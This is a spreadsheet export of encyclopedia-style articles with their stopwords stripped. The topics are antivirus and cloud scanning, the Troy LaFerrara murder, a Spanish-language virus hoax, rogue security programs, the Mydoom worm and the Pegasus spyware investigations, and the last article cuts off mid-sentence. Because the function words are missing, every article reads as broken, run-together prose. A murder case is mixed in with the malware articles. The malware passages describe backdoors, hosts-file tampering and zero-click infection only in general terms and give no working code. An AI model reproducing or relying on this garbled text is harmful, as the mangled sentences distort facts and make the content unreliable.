network cloud multiple antivirus behavioral detection programs used simultaneously order improve detection rates. parallel scanning files using potentially incompatible antivirus scanners achieved spawning virtual machine detection engine therefore eliminating possible issues. cloudav also perform "retrospective detection," whereby cloud detection engine rescans files file access history threat identified thus improving threat detection speed. finally, cloudav solution effective virus scanning devices lack computing power perform scans themselves.some examples cloud anti-virus products panda cloud antivirus immunet. comodo group also produced cloud-based anti-virus. online scanning some antivirus vendors maintain websites free online scanning capability entire computer, critical areas only, local disks, folders files. periodic online scanning good idea antivirus applications computers applications frequently slow catch threats. first things malicious software attack disable existing antivirus software sometimes know attack turning online resource installed infected computer. specialized tools virus removal tools available help remove stubborn infections certain types infection. examples include avast free anti- malware, free malware removal tools, avira antivir removal tool. also worth noting sometimes antivirus software produce false positive result, indicating infection none.a rescue disk bootable, storage device, used antivirus software outside installed operating system, order remove infections dormant. bootable antivirus disk useful when, example, installed operating system longer bootable malware resisting attempts removed installed antivirus software. examples bootable disks include bitdefender rescue kaspersky rescue disk 2018, windows defender offline (integrated windows since anniversary update). most rescue software also installed onto storage device, bootable newer computers. usage risks according survey, major businesses lose million annually dealing virus incidents. survey symantec 2009 found third small medium-sized business antivirus protection time, whereas home users kind antivirus installed. according sociological survey conducted data software 2010 women antivirus program all. also anti-virus anti-malware software caro, computer antivirus research organization comparison antivirus software comparison computer viruses eicar, european institute computer antivirus research firewall software internet security linux malware quarantine (computing) sandbox (computer security) timeline computer viruses worms virus hoax citations general bibliography</t>
  </si>
  <si>
    <t>Antivirus programs</t>
  </si>
  <si>
    <t>Murder of Troy LaFerrara</t>
  </si>
  <si>
    <t>troy laferrara port trevorton, pennsylvania murdered november 2013. miranda barbour husband, elytte barbour, found guilty sentenced life prison september 2014. murder notable unsubstantiated claim killers, miranda barbour, murdered least people, triggering worldwide news coverage case. murder couple troy laferrara craigslist, miranda offered exchange payment. elytte publicly denied miranda worker. said paid "delightful conversation." miranda stated agreed meet laferrara sex, charging $100.on november 2013, miranda allegedly laferrara susquehanna valley mall parking hummels wharf, pennsylvania. after settling payment, miranda laferrara drove miles sunbury, small city located miles northwest philadelphia. elytte barbour told police blanket back seat waiting. after allowed laferrara vehicle, miranda signaled elytte, jumped wrapped cord around laferrara's neck miranda stabbed times honda cr-v. laferrara's body discovered next day, november 2013, residential back yard sunbury. police said miranda elytte dumped laferrara's body, couple bought bleach wipes, towels, cleaning liquid remove blood inside vehicle went dinner. according arrest affidavit, elytte said couple killed laferrara wanted murder someone together.according police, barbours initially denied even knowing laferrara, police traced last call laferrara's phone miranda's phone. investigation developed, couple's stories allegedly changed miranda's story self-defense mutual confession premeditated murder. killing allegedly thrill killing, timed three weeks couple's wedding, police said. miranda barbour, elytte barbour, pled guilty first-degree murder charges carried possible death penalty upon conviction. both plead second-degree murder 2015 sentenced life prison. perpetrators miranda barbour interview sunbury daily item, miranda barbour claimed molested relative four. barbour's mother confirmed miranda's uncle charged sexual abuse minor sentenced years prison. barbour claimed joined satanic cult soon committed first murder cult leader forced shoot indebted cult. claimed responsible deaths least people" 2008 2013. this claim triggered worldwide media attention investigations claim police forces.a northumberland county district attorney told daily item skeptical miranda's claims, saying contact enforcement agencies lived received information verifying said." alaska state troopers released statement saying evidence barbour committed murders time alaska. elytte barbour elytte barbour graduated triton high school 2010. married miranda (née dean) october 2013 residing dunn, north carolina.on september 2014, sentenced life without parole. also internet homicide references</t>
  </si>
  <si>
    <t>Antichrist (virus hoax)</t>
  </si>
  <si>
    <t>"antichrist", anticristo, spanish-language computer virus hoax distributed email 2001. email contents email detected symantec july 2001. spanish text email translates alert: worst virus history. virus discovered classified microsoft mcafee destructive time. this virus discovered yesterday known name antichrist; antivirus discovered; simply destroys zeroth sector hard disk, vital information operation kept. works following way: sends names address book title: "surprise?!!!!!!!!!!" soon installed, destroys zeroth sector permanently destroys hard disk. please send e-mail many people can; case receive e-mail subject "surprise?!!!!!!!!!!!!!!!!!!!!!!!!!!", advice expert install automatically. references</t>
  </si>
  <si>
    <t>AntiVirus Gold</t>
  </si>
  <si>
    <t>antivirus gold rogue software developed icommerce solutions s.a. poses legitimate antivirus program. attempts persuade users software displaying nagware. believed name program attempt social engineering confuse people legitimate program anti-virus. antivirus gold downloaded bundle software trojan horse software. antivirus gold also rebranded many names antivirus golden antispyware gold. symptoms infection typical infection, desktop wallpaper modified advertisement displayed urging user antivirus gold. upon clicking message, browser opened point www.antivirus-gold.com. users also reported directed site clicking infected desktop. program attempts reinstall reboot removed uninstalling system restore. removal antivirus gold detected common anti-virus programs, including antispyware, norton family security products, anti-virus. anti-malware programs, malwarebytes' antimalware, also effective detecting removing rogue software antivirus gold. also spysheriff rogue security software references</t>
  </si>
  <si>
    <t>AntiVermins</t>
  </si>
  <si>
    <t>antivermins rogue security program dating 2007 claims commercial spyware-removal utility, fact itself, adware-advertised. software installs itself, without consent, user's computer registry. sends messages "system error, software fix" "your system infected spyware, antivermins clean it", redirecting user software's homepage prompted $50. homepage itself, english version seems like professional page, versions page languages appear translated using machine translation software. anti vermins made $100,000 tricking people buying characteristics behavior poor scan reporting false positives deceptive advertising within application fake critical infection alerts references external links summary antivermins symantec</t>
  </si>
  <si>
    <t>Mydoom</t>
  </si>
  <si>
    <t>mydoom also known my.doom, w32.mydoom@mm, novarg, mimail.r, shimgapi, w32/mydoom@mm, worm_mydoom, win32.mydoom computer worm affecting microsoft windows. first sighted january 2004. became fastest-spreading e-mail worm ever, exceeding previous records sobig worm iloveyou, record 2022 surpassed.mydoom appears commissioned e-mail spammers send junk e-mail infected computers. worm contains text message "andy; job, nothing personal, sorry," leading many believe worm's creator paid. early several security firms expressed belief worm originated programmer russia. actual author worm unknown. worm appeared poorly sent e-mail, people originally e-mailed worm ignored thinking spam. however, eventually spread infect least thousand computers across globe.speculative early coverage held sole purpose worm perpetrate distributed denial-of-service attack group. percent mydoom.a-infected hosts targeted group flood traffic. trade press conjecture, spurred group's claims, held meant worm created linux open source supporter retaliation group's controversial legal actions public statements linux. this theory rejected immediately security researchers. since then, likewise rejected enforcement agents investigating virus, attribute organized online crime gangs. initial analysis mydoom suggested variant mimail worm—hence alternate name mimail.r—prompting speculation people responsible worms. later analyses less conclusive link worms. mydoom named craig schmugar, employee computer security firm mcafee earliest discoverers worm. schmugar chose name noticing text "mydom" within line program's code. noted: evident early would big. thought 'doom' name would appropriate." technical overview mydoom primarily transmitted e-mail, appearing transmission error, subject lines including "error", "mail delivery system", "test" "mail transaction failed" different languages, including english french. mail contains attachment that, executed, resends worm e-mail addresses found local files user's address book. also copies "shared folder" peer-to-peer file sharing application kazaa attempt spread way. mydoom avoids targeting e-mail addresses certain universities, rutgers, mit, stanford berkeley, well certain companies microsoft symantec. some early reports claimed worm avoids .edu addresses, case. original version, mydoom.a, described carrying payloads: backdoor port 3127/tcp allow remote control subverted putting shimgapi.dll file system32 directory launching child process windows explorer); essentially backdoor used mimail. denial-of-service attack website controversial company group, timed commence february 2004. many virus analysts doubted payload would actually function. later testing suggests functions infected systems.a second version, mydoom.b, well carrying original payloads, also targets microsoft website blocks access microsoft sites popular online antivirus sites modifying hosts file, thus blocking virus removal tools updates antivirus software. smaller number copies version circulation meant microsoft's servers suffered effects. timeline january 2004: mydoom virus first identified around (1300 utc), beginning workday north america. earliest messages originate russia. period hours mid-day, worm's rapid spread slows overall internet performance approximately percent average page load times approximately fifty percent. computer security companies report mydoom responsible approximately e-mail messages time.although mydoom's denial service attack scheduled begin february 2004, group's website goes offline briefly hours worm first released. unclear whether mydoom responsible this. group claimed target several distributed denial service attacks 2003 unrelated computer viruses.27 january 2004: group offers $250,000 reward information leading arrest worm's creator. secret service begin investigations worm. january 2004: second version worm discovered days initial attack. first messages sent mydoom.b identified around 1400 also appear originate russia. version includes original denial service attack group identical attack aimed microsoft.com beginning february 2004; however, attacks suspected either broken, non-functional decoy code intended conceal backdoor function mydoom. mydoom.b also blocks access websites computer security companies, well pop-up advertisements provided doubleclick online marketing companies.the spread mydoom peaks; computer security companies report mydoom responsible roughly five e-mail messages time.29 january 2004: spread mydoom begins decline bugs mydoom.b's code prevent spreading rapidly first anticipated. microsoft offers $250,000 reward information leading arrest creator mydoom.b. february 2004: estimated million computers around world infected mydoom begin virus's massive distributed denial service attack—the largest attack date. february arrives east asia australia, removes www.sco.com around 1700 january. (there independent confirmation www.sco.com fact suffering planned ddos.) february 2004: mydoom.b's distributed denial service attack microsoft begins, microsoft prepares offering website affected worm, information.microsoft.com. however, impact attack remains minimal www.microsoft.com remains functional. this attributed comparatively distribution mydoom.b variant, high load tolerance microsoft's servers precautions taken company. some experts point burden less microsoft software updates web-based services. february 2004: doomjuice, “parasitic” worm, begins spreading. this worm uses backdoor left mydoom spread. attack non-infected computers. payload, akin mydoom.b's, denial-of-service attack microsoft. february 2004: mydoom.a programmed stop spreading. however, backdoor remains open date. march 2004: mydoom.b programmed stop spreading; mydoom.a, backdoor remains open. july 2004: variant mydoom attacks google, altavista lycos, completely stopping function popular google search engine larger portion workday, creating noticeable slow-downs altavista lycos engines hours. september 2004: mydoom versions appear, sparking worries new, powerful mydoom prepared. february 2005: mydoom version appears. july 2009: mydoom resurfaces july 2009 cyber attacks affecting south korea united states. also timeline computer viruses worms references external links mydoom ddos attacks "email-worm.win32.mydoom.a". viruslist.com. kaspersky lab. archived original 2006-10-15. offers reward arrest conviction mydoom virus author press release, january 2004. note claim denial service attack already started date. "mydoom". f-secure computer virus information pages. f-secure corporation. "win32.mydoom.a". security advisor. computer associates international. archived original 2005-04-10. retrieved 2005-04-30. information mydoom worm symantec.com "computer virus that caused billion damage". infographics show youtube channel.</t>
  </si>
  <si>
    <t>Pegasus Project (investigation)</t>
  </si>
  <si>
    <t>pegasus project international investigative journalism initiative revealed governments' espionage journalists, opposition politicians, activists, business people others using private pegasus spyware developed israeli technology cyber-arms company group. pegasus ostensibly marketed surveillance "serious crimes terrorism". 2020, target list 50,000 phone numbers leaked forbidden stories, analysis revealed list contained numbers leading opposition politicians, human rights activists, journalists, lawyers political dissidents.a small number phones inspected amnesty international's cybersecurity team revealed forensic evidence pegasus spyware, zero-click trojan virus developed group. this malware provides attacker full access targeted smartphone, data, images, photographs conversations well camera, microphone geolocation. this information passed along media organisations "the pegasus project" umbrella name. reports started published member organisations july 2021, revealing notable non-criminal targets analysing practice threat freedom press, freedom speech, dissidents democratic opposition. july, heads state revealed former targets pegasus malware. various parties called investigation abuses limitation trading repressive malware, among newsrooms involved, committee protect journalists, international press institute, edward snowden. software pegasus spyware developed israeli cyberarms company group. covertly installed mobile phones (and devices) running versions android. spyware named mythical winged horse pegasus—it trojan horse sent "flying air" infect phones. usages pegasus spyware monitored years. amnesty argued digital invasion correlated real-life consequences spied targets, psychological physical damages.the group exports overseen israeli ministry defense's defense exports control agency (deca). investigation origins members 2020, list 50,000 phone numbers believed belong individuals identified "people interest" clients israeli cyberarms firm group leaked amnesty international forbidden stories, media nonprofit organisation based paris, france. this information passed along media organisations umbrella name "the pegasus project". over several months, journalists guardian (united kingdom), monde radio france (france), zeit, süddeutsche zeitung, (germany), washington post frontline (united states), haaretz (israel), aristegui noticias proceso (mexico), knack soir (belgium), wire (india), daraj (syria), direkt36 (hungary), occrp investigated spying abuses. investigative methodology leaked list targeted phone numbers provides indication "person interest" first indication possible hacking, confirmed direct forensic examination phone. amnesty published forensic methodology report: catch group's pegasus. according amnesty, "the citizen university toronto independently peer-reviewed draft forensic methodology outlined report. their review found independent peer review amnesty international's forensic methods identifying pegasus spyware". amnesty also published various tools data investigation, including mobile verification toolkit (mvt) github repository listing indicators nso/pegasus compromised devices. some emerging unverified online services claim able assess infection pegasus, usage discouraged possible scams themselves. amnesty forbidden stories received numerous queries checking devices able satisfy demand assistance. findings investigation suggested pegasus continued widely used authoritarian governments human rights activists, journalists lawyers worldwide, although claims intended criminals terrorists.a french journalist noted matter cyber-surveillance, observe abuse facto rule". forbidden stories argues pegasus software usages facto constitute global weapon silence journalists.forensic architecture pegasus project lead data analysis built data visualisation plotting attempt hacking dissidents together real-life intimidations, threats violence. they argued pegasus become tool states repress people. regions targets targets include known criminals well human rights defenders, political opponents, lawyers, diplomats, heads state nearly journalists countries. guardian mentioned journalists morocco, journalists azerbaijan, journalists united arab emirates journalists india targeted. some targets whose names revealed listed below; list non-exhaustive. heads state government according analysis german newspaper zeit others, following incumbent former heads state government targeted, implying possible full access mobile phones' data: abdelaziz bouteflika, former president algeria noureddine bedoui, former prime minister algeria mostafa madbouly, prime minister egypt charles michel, former prime minister belgium current president european council emmanuel macron, president france édouard philippe, former prime minister france édith chabre, wife édouard philippe most french ministers numerous french diplomats barham salih, president iraq bakhytzhan sagintayev, former prime minister kazakhstan saad hariri, prime minister lebanon mohammed king morocco saadeddine othmani, prime minister morocco imran khan, prime minister pakistan cyril ramaphosa, president south africa ruhakana rugunda, former prime minister uganda ahmed obeid daghr, former prime minister yemen azerbaijan fatima movlamli, azerbaijani civil society activist journalist opposed local authoritarian government. intimate photographs leaked facebook 2019 hungary used opposition journalists, opposition leaders critics. szabolcs panyi, hungarian investigative journalist direkt36, hacked 2019. panyi joined pegasus project investigation. andrás szabó, hungarian investigative journalist. dávid dercsényi, hungarian investigative journalist (hvg). györgy gémesi, right-wing opposition politician, mayor gödöllő president alliance hungarian local-governments. jános bánáti, president hungarian association, nine lawyers. zoltán varga, businessman owner central media group, publish opposition press products (24.hu). attila chikán, former economy minister first cabinet viktor orbán, currently vocal critic orbán's politics. india used opposition leaders, union ministers, journalists, administrators election commissioner heads central bureau investigation (cbi) minority leaders. rahul gandhi, indian politician main rival indian prime minister narendra modi, targeted cellphones. would claim "all [his] phones tapped".five close friends indian national congress party officials leaked list potential targets. prashant kishor, political strategist tactician, linked several prime minister narendra modi's rivals, also targeted. some opposition politicians mamata banerjee even claimed pegasus used keep track meetings two. ashok lavasa, ex-election commissioner india flagged prime minister narendra modi's poll code violation 2019 indian general election targeted. alok verma, ousted head central bureau investigation (cbi) prime minister narendra modi 2018 target. numerous indian politicians including deputy chief minister karnataka parameshwara, well close aides chief minister kumaraswamy senior congress leader siddaramaiah. abhishek banerjee, west bengal politician india trinamool congress, nephew incumbent chief minister west bengal mamata banerjee. siddharth varadarajan, delhi–based, american investigative journalist founder wire. varadarajan joined pegasus project investigation. umar khalid, left-wing student activist leader democratic students' union, added list late 2018, charged sedition. arrested september 2020 organising delhi riots; provided evidence taken phone. currently jail awaiting trial. stan swamy, indian jesuit father activist. swamy died july 2021 contracting covid-19 prison.collaborators hany babu, shoma rona wilson also project's list alleged targets. ashwini vaishnaw, minister electronics information technology assumed office less weeks investigation revealed. inner circle 14th dalai lama tenzin gyatso, 17th karmapa ogyen trinley dorje tibetan figures, including:tempa tsering, dalai lama's envoy delhi tenzin taklha, dalai lama's senior aide chhimey rigzen, dalai lama's senior aide lobsang tenzin, samdhong rinpoche, responsible selection dalai lama's successor lobsang sangay, former president tibetan government-in-exile penpa tsering, president tibetan government-in-exile italy romano prodi, former prime minister italy former president european commission, spied working special envoy sahel. mexico used anti-corruption journalists, opposition leaders judge. cecilio pineda birto (died march 2017), mexican investigative anti-corruption journalist. phone added pegasus target weeks assassination. eduardo ferrer mac-gregor poisot, mexican judge, former president inter-american court human rights. alejandro solalinde, catholic priest champion migrants' rights. believed targeted support opposition politicians. morocco used opposition, western sahara–friendly journalists morocco france, 6,000 algerian politicians, high-ranking military officials, heads intelligence, civil servants, diplomats activists. edwy plenel, french journalist, co-founder publishing editor opposition newsroom mediapart, hacked 2019 morocco. lénaïg bredoux, french journalist also mediapart, hacked 2020 morocco. ignacio cembrero, spanish journalist specialising maghreb. reported hacked moroccan government learning june moroccan newspaper "picked whatsapp conversations senior officials spanish administration". ahmed gaid salah, former chief staff algerian people's national armed forces haddad, algerian businessman supporter former president abdelaziz bouteflika abdelkader messahel, former minister foreign affairs algeria poland july 2017, prime minister beata szydło agreed benjamin netanyahu pegasus licenses. michał woś, deputy minister justice, requested parliamentary committee divert funds ministry-run fund "combat crime." once approved, central anticorruption bureau (cba) purchased licenses 33.4 million. transaction group camouflaged unrelated invoices. contract licenses used three years mediated matic, company established former militia security service associates. spyware first deployed november 2017.in 2018, citizen suspected operator codenamed "orzelbialy" (polish "white eagle," reference coat arms poland) spreading pegasus mobile network operators. 2020, rzeczpospolita reported bulk evidence corruption case former civic platform politician sławomir nowak obtained using pegasus. denied ever buying license, still government assured court permission.in december 2021, citizen announced found multiple hacks phones prominent opposition figures 2019 parliamentary elections right-wing populist party justice (pis) jarosław kaczyński slim margin, lead erosion judicial independence press freedom. january 2022, reported victims include: roman giertych, lawyer representing opposition politicians, deputy prime minister 2006–2007 kaczyński's cabinet, wrzosek, prosecutor challenged government's attempts purge judiciary, krzysztof brejza, attorney time, civic platform civic coalition campaign, senate seat. hack brejza later confirmed amnesty international.michał kołodziejczak, farmer leader social movement agrounia, tomasz szwejgiert, journalist alleged former associate cba, hacked co-authoring book mariusz kaminski, head cba.adam hofman, former spokesman, dawid jackiewicz, former treasury minister cabinet beata szydło, mariusz antoni kamiński, former bartłomiej misiewicz, former head cabinet former spokesman ministry national defence, katarzyna kaczmarek, wife tomasz kaczmarek (referred "agent tomek"), former policeman former officer, later mp.on february 2022, supreme audit office (nik) revealed 2020-2021, employees' devices surveillance 7,300 attacks. according experts, three phones could infected pegasus. saudi arabia used opposition journalist women's rights activist since 2018. jamal khashoggi (died october 2018), saudi-american investigative opposition journalist, contributor washington post, assassinated saudi operatives. khashoggi, wife hanan el-atr phones people close targeted assassination.hatice cengiz, khashoggi's partner, infected pegasus forensic evidence spyware found october 2018, days khashoggi's assassination. khashoggi's contacts yasin aktay, yahya assiri, hanan el-atr, abdullah khashoggi, madawi al-rasheed, azzam tamimi also targeted. i̇rfan fidan, turkey's istanbul chief prosecutor charge khashoggi murder's investigation, later charged saudi operatives, list leaked targets. loujain al-hathloul, prominent saudi women's rights activist, selected 2018, likely united arab emirates ally saudi arabia), abduction return saudi arabia arrest possibly torture. released prison february 2021, freedom movement still limited. madawi al-rasheed, british citizen saudi origin professor social anthropology. united arab emirates used human rights activists, local leaders local nobility sheikh maktoum family members. with 10,000 people interest linked dubai, extensive uses pegasus. targets mainly qatar, also included people egypt, lebanon, iraq, yemen, saudi arabia. 2020, pegasus license stripped dubai human rights concerns spying sheikh maktoum family members. princess haya bint hussein, ex-wife sheikh maktoum dubai, self-exiled london. list "people interest" includes phone number well phone number closest aides, advisers friends, including personal assistant, security staffs, lawyers advising custody divorce dispute sheikh maktoum.security firm quest's staffs: martin smith, ceo; director investigations; shimon cohen, communications adviser. john gosden, british horse racing trainer friend. sheikha latifa bint mohammed maktoum, daughter sheikh maktoum dubai, attempted escape goa, india. from there, hoped travel united states, planned seek asylum, caught indian special forces. phone number appeared february 2018, escape, phone already discarded café bathroom replaced brand-new phone cards. phones used latifa's friends family soon added system. suspected pegasus surveillance friends' phones helped dubai track latifa's escape, abduct back near goa.christian elombo, french soldier friend latifa, girlfriend juan mayer, skydiving photographer friend lynda bouchiki, skydiver friend, events manager. latifa chatted phone bouchiki fleeing. sioned taylor, briton skydiver friend, maths teacher. latifa chatted phone taylor fleeing. david haigh, british national previously detained tortured prison, human rights campaigner lawyer campaigning free latifa. alaa al-siddiq (died june 2021), emirati human rights activist, executive director human rights organisation alqst daughter muhammad al-siddiq, uae-94 pro-democracy political prisoners. documenting violences gulf governments prisoners. following 2011 arab spring, alaa al-siddiq self-exiled qatar since 2012. family members stripped nationality. following death accident 2021 refused body taken back country burial. citizens found traces pegasus surveillance phone.ahmed mansoor, emirati human rights reformist blogger, confirmed hacked pegasus. arrested 2011, pardoned, arrested 2017 years sentences. detained dire conditions. over 3,000 qataris. european, asian human rights activists supporting rights gulf countries. reactions group's response vetting licence contract group deny presence spyware, responding report stating rigorously vetted customers' human rights records allowing tools. says military-grade pegasus supposed used prevent serious crime terrorism. stated purchasing client governments bidden signed contract licence, agreeing terms uses, contractually limited legitimate criminal terrorist targets. once sold, group says know client governments spyware. involvement denial deresponsibilisation group stated: "nso operate systems sells vetted government customers, access data customers' targets. operate technology, collect, possesses, access kind data customers. contractual national security considerations, cannot confirm deny identity government customers, well identity customers shut systems."the group categorically claimed list question unrelated them, source allegations verified reliable one. "this attempt build something based crazy lack information... there something fundamentally wrong investigation." owner company developed pegasus spyware categorically refutes allegations, stating list phone numbers question nothing pegasus spyware. denied "false claims" clients' activities, said would "continue investigate credible claims misuse take appropriate action". journalists/ngos journalists around world expressed outrage anti-criminality tools non-criminals, journalists, opposition representatives, civilians. edward snowden called governments impose global moratorium international spyware trade order avoid ubiquitous violation privacy associated abuses.haaretz argued invasive monitoring technology weapon choice autocratic governments, allowing continuous monitoring opponents, preventing protests beginning organised, discouraging sources share information journalists. this technology should, therefore, shared countries independent solid rule law.the committee protect journalists called critical reform surveillance software industry market.the international press institute, international press freedom network, denounced abuse spying journalists, calling formal investigations accountability.tamer almisshal, investigative journalist jazeera arabic, said, "[the hacking jazeera staffers' journalists' phones crime journalism. based spyware, journalists arrested, disappeared, even killed. khashoggi example".in statement, national association hungarian journalists said "shocked" revelations also stated: case, unacceptable, outrageous illegal, full information must disclosed public immediately". tweet, press club india (pci) issued statement: this first time history country pillars democracy judiciary, parliamentarians, media, executives ministers spied upon. this unprecedented condemns unequivocally. snooping done ulterior motives. what disturbing foreign agency, nothing national interest country, engaged citizens. this breeds distrust invite anarchy. govt come clean front clarify. similarly, editor's guild india also released statement directed alleged spying made indian government, saying: this snooping essentially conveys journalism political dissent equated 'terror'. constitutional democracy survive governments make effort protect freedom speech allows surveillance impunity?it asked supreme court monitored enquiry matter, demanded inquiry committee include people impeccable credibility different walks life—including journalists civil society—so independently investigate facts around extent intent snooping using services pegasus. companies amazon's cloud computing subsidiary stated terminated "relevant infrastructure accounts" linked group, following investigation amnesty international discovered amazon cloudfront used infect targets pegasus malware.the whatsapp, will cathcart, called global moratorium unaccountable surveillance technology defended end-to-end encryption following reports. national governments algeria statement released, algeria's public prosecutor ordered investigation reports country target pegasus spyware. france after revelations pegasus project investigation, revealed french president emmanuel macron targeted, france launched investigation matter. aftermath revelations, macron changed telephone number replaced phone. furthermore, ordered overhaul security procedures.macron reportedly contacted israel's prime minister naftali bennett discuss israel's internal investigation express concern data appeared list potential targets urged bennett conduct inquiry.french intelligence (anssi) confirmed pegasus spyware found phones three journalists, including journalist france first time independent official authority corroborated findings investigation. hungary statement office viktor orbán hungary stated aware alleged data collection. july, prosecution service hungary announced would open investigation determine whether illegal data collection.on november 2021, lajos kósa, member parliament vice president fidesz, member parliamentary defence enforcement committee, admitted ministry interior purchased used pegasus software. india government denied usage pegasus spyware response far. government also denied request investigation independent supreme court inquiry opposition matter.the official response government india washington post stated "[t]he allegations regarding government surveillance specific people concrete basis truth associated whatsoever" news reports attempt "malign indian democracy institutions". they stated case interception, monitoring decryption approved union home secretary exists oversight mechanism form review committee headed union cabinet secretary interceptions done process law.the former minister india ravi shankar prasad asked, nations using pegasus said, india targeted?"the indian minister ashwini vaishnaw statement parliament stated reports "highly sensational" factual basis". stated rubbished claims. stated existence numbers list sufficient evidence indicate spyware used said report stated without physical examination phone claims cannot corroborated.the minister home internal security amit shah statement blog insinuated attempt disrupt monsoon session parliament opposition parties "jumping bandwagon" trying "derail anything progressive comes parliament". stated report attempt "derail india's development trajectory conspiracies".replying allegations opposition, minister state ministry home affairs ajay kumar mishra said reason probe people made allegations "political failures". israel israeli government denied access information gathered nso's clients.in aftermath revelations investigations pegasus project, head israeli parliament's foreign affairs defence committee announced commission investigate allegations misuse pegasus surveillance hacking.in december 2021, israeli defense ministry imposed restrictions export cyber warfare tools result scandals involving nso. kazakhstan revelations made investigation, came light kazakhstan's former prime minister, bakhytzhan sagintayev, could targeted. furthermore, reported kassym-jomart tokayev, president kazakhstan, also targeted.however, officials claimed reports allegations president spied "without evidence". furthermore, deputy head kazakhstan's presidential administration dauren abaev said list targets "rather intriguing information without evidence". morocco moroccan government denied claims acquiring using pegasus, saying "categorically rejects condemns unfounded false allegations, done previous similar allegations amnesty international". moroccan ambassador france, chakib benmoussa, also denied reports country's authorities spied french president emmanuel macron.in interview given jeune afrique, moroccan foreign minister nasser bourita stated "important shed light facts, controversy slander", claimed certain titles unionised within journalist consortium "serve agendas well known primary hostility towards morocco ulcerated successes leadership majesty king mohammed vi."morocco later sued amnesty international forbidden stories defamation, lawyer olivier baratelli, acted behalf government, saying moroccan state "wants possible light cast false allegations", "does intend multiple lies fake news spread past days unpunished". also issued defamation citations monde, mediapart radio france july, filed injunction request german newspaper süddeutsche zeitung august. pakistan prime minister pakistan, imran khan, whose name revealed list, called united nations investigation indian pegasus. rwanda rwanda, statement vincent biruta, minister foreign affairs international cooperation, denied using pegasus claimed "false accusations" country using pegasus "part ongoing campaign cause tensions rwanda countries, promote disinformation rwanda domestically internationally." saudi arabia saudi arabia's official saudi press agency denied allegations pegasus spyware journalists human rights activists "baseless". allegations dismissed "untrue". united arab emirates statement released uae's foreign minister stated allegations pegasus spyware journalists individuals "categorically false" allegations evidentiary basis denied allegations. this despite ample material evidences dissidents targeted. other reactions india indian national congress accused prime minister narendra modi "treason" compromising national security following release reports called removal minister home internal security amit shah investigation role prime minister narendra modi affair.the indian minister made statement similar claims made past regarding pegasus whatsapp factual basis even denied supreme court india. however, many statements made indian minister verified internet freedom foundation found accurate.west bengal chief minister mamata banerjee alleged central government intends "turn india surveillance state" "democracy danger". july 2021 west bengal chief minister announced commission inquiry alleged surveillance phones using pegasus. retired supreme court judge justice madan lokur, former chief justice calcutta high court, justice (retd) jyotirmay bhattacharya, appointed members commission.in india, news articles released making claims amnesty never claimed leaked phone numbers nso's pegasus spyware list. however, reports later proven false, amnesty issued statement stating categorically stands findings investigation data irrefutably linked potential targets pegasus.the european parliament awarded 2021 daphne caruana galizia journalism prize pegasus project. government investigations july 2021, reported french prosecutors would investigate allegations moroccan intelligence services used pegasus french journalists.france's national agency information systems security (anssi) identified digital traces pegasus three journalists' phones relayed findings paris public prosecutor's office, overseeing investigation possible hacking. also group darkmatter (emirati company) group whatsapp snooping scandal facebook–cambridge analytica data scandal facebook abuses campaigns governments edward snowden pegasus project revelations india references</t>
  </si>
  <si>
    <t>Pegasus (spyware)</t>
  </si>
  <si>
    <t>pegasus spyware developed israeli cyber-arms company group covertly installed mobile phones (and devices) running versions android. pegasus able exploit versions 14.7, zero-click exploit. 2022, pegasus capable reading text messages, tracking calls, collecting passwords, location tracking, accessing target device's microphone camera, harvesting information apps. spyware named pegasus, winged horse greek mythology. trojan horse computer virus sent "flying air" infect cell phones.pegasus discovered august 2016 failed installation attempt iphone human rights activist investigation revealing details spyware, abilities, security vulnerabilities exploited. news spyware caused significant media coverage. called "most sophisticated" smartphone attack ever, first time malicious remote exploit used jailbreaking gain unrestricted access iphone.the spyware used surveillance anti-regime activists, journalists, political leaders several nations around world. july 2021, investigation initiative pegasus project, along in-depth analysis human rights group amnesty international, reported pegasus still widely used high-profile targets. background group developed first iteration pegasus spyware 2011. company states provides "authorized governments technology helps combat terror crime." group published sections contracts require customers products criminal national security investigations stated industry-leading approach human rights. discovery pegasus's exploitation identified august 2016. arab human rights defender ahmed mansoor received text message promising "secrets" torture happening prisons united arab emirates following link. mansoor sent link citizen university toronto, investigated, collaboration lookout, finding mansoor followed link would jailbroken phone implanted spyware form social engineering.citizen lookout discovered link downloaded software exploit three previously unknown unpatched zero-day vulnerabilities ios. according analysis, software jailbreak iphone malicious opened. software installs collects communications locations targeted iphones. software also collect wi-fi passwords. researchers noticed software's code referenced group product called "pegasus" leaked marketing materials. pegasus previously come light leak records hacking team, indicated software supplied government panama 2015. citizen lookout notified apple's security team, patched flaws within days released update ios. patch macos released days later.regarding widespread issue was, lookout explained blog post: believe spyware wild significant amount time based indicators within code" pointed code shows signs "kernel mapping table values back (released 2013). york times times israel reported appeared united arab emirates using spyware early 2013. used panama former president ricardo martinelli 2012 2014, established consejo seguridad pública defensa nacional (national security council) use. chronology several lawsuits outstanding 2018 claimed group helped clients operate software therefore participated numerous violations human rights initiated clients. months murder dismemberment washington post journalist jamal khashoggi, saudi human rights activist, saudi arabian consulate istanbul, turkey, saudi dissident omar abdulaziz, canadian resident, filed suit israel group, accusing firm providing saudi government surveillance software friends, including khashoggi.in december 2020, jazeera investigative show hidden more immense covered pegasus penetration phones media professionals activists; israel eavesdrop opponents allies. technical details spyware installed devices running certain versions ios, apple's mobile operating system, well android devices. rather specific exploit, pegasus suite exploits uses many vulnerabilities system. infection vectors include clicking links, photos app, apple music app, imessage. some exploits pegasus uses zero-click—that without interaction victim. once installed, pegasus reported able arbitrary code, extract contacts, call logs, messages, photos, browsing history, settings, well gather information apps including limited communications apps imessage, gmail, viber, facebook, whatsapp, telegram, skype.in april 2017, lookout report, google researchers discovered android malware "believed created group technologies" named chrysaor (pegasus' brother greek mythology). according google, "chrysaor believed related pegasus spyware". 2017 security analyst summit held kaspersky lab, researchers revealed pegasus available android addition ios. functionality similar version, mode attack different. android version tries gain root access (similar jailbreaking ios); fails, asks user permissions enable harvest least data. time google said android devices infected.pegasus hides possible self-destructs attempt eliminate evidence unable communicate command-and-control server days, wrong device. pegasus also self-destruct command. possible compromise target device simpler means, pegasus installed setting wireless transceiver near target device, gaining physical access device. development capabilities earliest version pegasus identified 2016 relied spear-phishing attack required target click malicious link text message email.as august 2016 according former employee u.s. version pegasus 1-click capabilities phones apart blackberry models could infiltrated 0-click attack.in 2019, whatsapp revealed pegasus employed vulnerability launch zero-click attacks (the spyware would installed onto target's phone calling target phone; spyware would installed even call answered).since 2019, pegasus come rely iphone imessage vulnerabilities deploy spyware.by 2020, pegasus shifted towards zero-click exploits network-based attacks. these methods allowed clients break target phones without requiring user interaction without leaving detectable traces. vulnerabilities lookout 